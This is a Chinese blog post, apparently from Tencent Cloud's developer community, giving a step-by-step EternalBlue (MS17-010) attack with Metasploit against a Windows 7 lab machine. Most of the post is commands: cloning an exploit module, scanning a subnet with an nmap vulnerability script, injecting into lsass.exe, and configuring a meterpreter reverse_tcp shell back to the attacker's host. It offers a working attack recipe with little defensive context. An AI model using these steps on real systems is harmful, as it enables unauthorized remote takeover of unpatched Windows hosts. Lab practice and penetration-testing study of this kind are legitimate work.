前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MSF框架实现“永恒之蓝”ms17-010的exp攻击

MSF框架实现“永恒之蓝”ms17-010的exp攻击

作者头像
逍遥子大表哥
发布2021-12-17 12:45:15
1.2K0
发布2021-12-17 12:45:15
举报
文章被收录于专栏:kali blogkali blog

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

本次用到的环境:

kali系统.ip地址:192.168.1.106

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102

具体的步骤如下:

kali系统下安装wine32:

代码语言:javascript
复制
dpkg --add-architecture i386 && apt-get update &&apt-get install wine32

git clone下载其利用脚本

代码语言:javascript
复制
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

代码语言:javascript
复制
cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

nmap漏洞指定扫描:

代码语言:javascript
复制
nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open

启动msf,然后进行一系列设置:

代码语言:javascript
复制
service postgresql start
msfconsole
代码语言:javascript
复制
search  eternalblue
use  exploit/windows/smb/eternalblue_doublepulsar

进行攻击载荷的配置工作:

代码语言:javascript
复制
set  DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps     
set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set  PROCESSINJECT   lsass.exe
set  TARGETARCHITECTURE  x64
set  rhost  192.168.1.102
show targets
set  target 8
set  payload windows/x64/meterpreter/reverse_tcp
show options
set  lhost 192.168.1.106
exploit

效果如下

版权属于:逍遥子大表哥

本文链接:/developer/article/1920484

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与?腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客?前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • git clone下载其利用脚本
  • nmap漏洞指定扫描:
  • 进行攻击载荷的配置工作:
  • 效果如下
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com